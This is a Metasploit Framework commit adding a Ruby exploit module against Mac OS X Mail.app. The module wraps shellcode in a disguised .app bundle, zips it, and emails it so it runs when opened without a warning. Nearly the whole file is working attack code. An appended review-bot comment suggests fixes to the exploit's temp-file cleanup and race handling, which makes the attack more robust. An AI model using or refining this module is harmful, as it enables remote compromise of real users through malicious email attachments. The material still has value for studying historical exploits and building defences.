New mail.app exploit for leopard

git-svn-id: file:///home/svn/framework3/trunk@5209 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-11-28 22:23:31 +00:00
parent 907282b061
commit 9b343c7149
2 changed files with 231 additions and 0 deletions

Binary file not shown.


@ -0,0 +1,231 @@
##
# $Id: mailapp_image_exec.rb 5206 2007-11-26 22:29:07Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'rex'
require 'msf/core'
require 'zip/zipfilesystem'
require 'ftools'
module Msf
class Exploits::Osx::Email::MailAppAttachment < Msf::Exploit::Remote
#
# This module sends email messages via smtp
#
include Exploit::Remote::SMTPDeliver
def initialize(info = {})
super(update_info(info,
'Name' => 'Mail.app Application Attachment Execution',
'Description' => %q{
This module exploits sends an email message to a user containing
shellcode encoded into an executable attachment. The user does not receive
any warning dialog when opening this attachment with Mail.app. Tested on 10.5.
},
'License' => MSF_LICENSE,
'Author' => ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
'Version' => '$Revision: 5206 $',
'References' =>
[
# ?
],
'Stance' => Msf::Exploit::Stance::Passive,
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'BadChars' => "",
'Compat' =>
{
'ConnectionType' => '-bind -find',
},
},
'Targets' =>
[
[ 'Mail.app - Binary Payloads (x86)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Mail.app - Binary Payloads (ppc)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
],
'DisclosureDate' => 'Nov 28 2007'
))
register_options(
[
OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]),
OptString.new('MAILMESSAGE', [false, "This text contents of the email message"])
], self.class)
end
def autofilter
false
end
def exploit
data = rand_text_alpha(rand(32)+1)
msg = Rex::MIME::Message.new
msg.mime_defaults
msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
txt = datastore['MAILMESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)
bin = ''
if(target.arch.index(ARCH_PPC))
bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
end
if(target.arch.index(ARCH_X86))
bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
end
zfd = Tempfile.new('mailappzip')
# XXX: Race condition, fix the Zip API
File.unlink(zfd.path)
name = rand_text_alpha(rand(4)+4).downcase.capitalize
Zip::ZipFile.open(zfd.path, Zip::ZipFile::CREATE) do |zf|
zf.dir.mkdir("#{name}.app")
zf.dir.chdir("#{name}.app")
zf.dir.mkdir("Contents")
zf.dir.chdir("Contents")
zf.file.open("Info.plist", "w") do |fd|
fd.write(get_info_plist(name))
end
zf.file.open("PkgInfo", "w") do |fd|
fd.write("APPL????")
end
zf.dir.mkdir("MacOS")
zf.dir.chdir("MacOS")
zf.file.open(name, "w") do |fd|
fd.write(bin)
end
zf.dir.chdir("..")
zf.dir.mkdir("Resources")
zf.dir.chdir("Resources")
zf.file.open("#{name}.icns", "w") do |fd|
fd.write(get_app_icns())
end
end
cmd = Rex::Text.encode_base64(File.read(zfd.path), "\r\n")
zfd.close
msg.add_part(Rex::Text.encode_base64(txt, "\r\n"), "text/plain", "base64", "inline")
msg.add_part(cmd , "application/zip; x-mac-auto-archive=yes; name=\"#{name}.app.zip\"", "base64", "attachment; filename=#{name}.app.zip" )
send_message(msg.to_s)
print_status("Waiting for a payload session (backgrounding)...")
end
def get_info_plist(name)
%Q|
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>#{name}</string>
<key>CFBundleGetInfoString</key>
<string>2.1.1</string>
<key>CFBundleIconFile</key>
<string>#{name}.icns</string>
<key>CFBundleIdentifier</key>
<string>com.#{name.downcase}</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>Busted</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleShortVersionString</key>
<string>2.1.1</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleVersion</key>
<string>2.1.1</string>
<key>LSHasLocalizedDisplayName</key>
<false/>
<key>NSHumanReadableCopyright</key>
<string>#{name}</string>
</dict>
</plist>
|
end
def get_app_icns
File.read(File.join(Msf::Config.install_root, "data", "exploits", "iceweasel_macosx.icns"))
end
end
end
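Review bot: The `.app.zip` that `exploit` builds at `zfd.path` is never deleted: `File.unlink(zfd.path)` removes the Tempfile's original inode before `Zip::ZipFile.open(..., CREATE)` recreates the path, and the later `zfd.close` only closes that already-unlinked handle, so a payload-bearing archive stays in the temp directory after the message is sent (the Tempfile finalizer may remove it at GC, but nothing does so deterministically, and nothing at all if `send_message` raises). Delete it as soon as it has been read, e.g. right after the base64 line: `File.unlink(zfd.path) rescue nil` before `zfd.close`, ideally inside an `ensure` so the cleanup also runs on the error path. The same unlink-then-create sequence is the window the `XXX: Race condition` comment refers to — until the Zip API can take an open IO, creating the archive inside a directory made by this module with mode 0700 would at least keep other local users from planting a symlink at that path. Minor points in the same hunk: `data` on the first line of `exploit` is unused, the description reads "This module exploits sends", and `References` is left as `# ?`.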